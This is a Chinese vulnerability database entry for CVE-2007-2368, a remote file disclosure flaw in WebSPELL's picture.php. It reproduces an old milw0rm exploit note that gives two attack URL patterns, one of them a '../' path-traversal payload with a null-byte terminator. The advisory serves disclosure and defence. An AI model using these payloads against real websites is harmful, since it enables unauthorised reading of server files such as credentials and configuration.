WebSPELL 'picture.php'信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112632 漏洞类型 未知
发布时间 2007-04-05 更新时间 2007-04-30
CVE编号 CVE-2007-2368 CNNVD-ID CNNVD-200704-620
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/3673
https://www.securityfocus.com/bid/86220
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-620
|漏洞详情
WebSPELL的picture.php文件存在敏感信息泄露漏洞。远程攻击者可以借助文件参数,读取任意文件。
|漏洞EXP
# WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability
# Discovered by: Trex
# Visit: www.Trex-Online.net / www.UnderGround.ag
# Comment: Happy easter!
#
#   ___     ___
#  /   \   /   \       ___________________________
# /   / \_/ \   \     /                           \
# \__/\     /\__/    /  GIVE ME A CARROT OR I WILL \
#      \O O/         \      BLOW UP YOUR HOUSE     /
#   ___/ ^ \___      / ___________________________/
#      \___/        /_/
#      _/ \_
#   __//   \\__
#  /___\/_\/___\
#
#
#
# Vulnerability 1:
# Advantage: works independently from PHP version.
# Disadvantage: works dependently from PHP option register_globals (= on).
#
# http://[SITE][PAHT]/picture.php?file=[FILE]
#
#
#
# Vulnerability 2:
# Advantage: works independently from PHP option register_globals.
# Disadvantage: works dependently from PHP versions (< 4.3.0).
#
# http://[SITE][PAHT]/picture.php?id=../../../[FILE]%00
#
#
#
# Solution:
# http://fixes.trex-online.net/picture.rar

# milw0rm.com [2007-04-05]
|受影响的产品
webSPELL webSPELL 4.1.2
|参考资料

来源:MILW0RM
名称:3673
链接:http://www.milw0rm.com/exploits/3673
来源:VUPEN
名称:ADV-2007-1274
链接:http://www.frsirt.com/english/advisories/2007/1274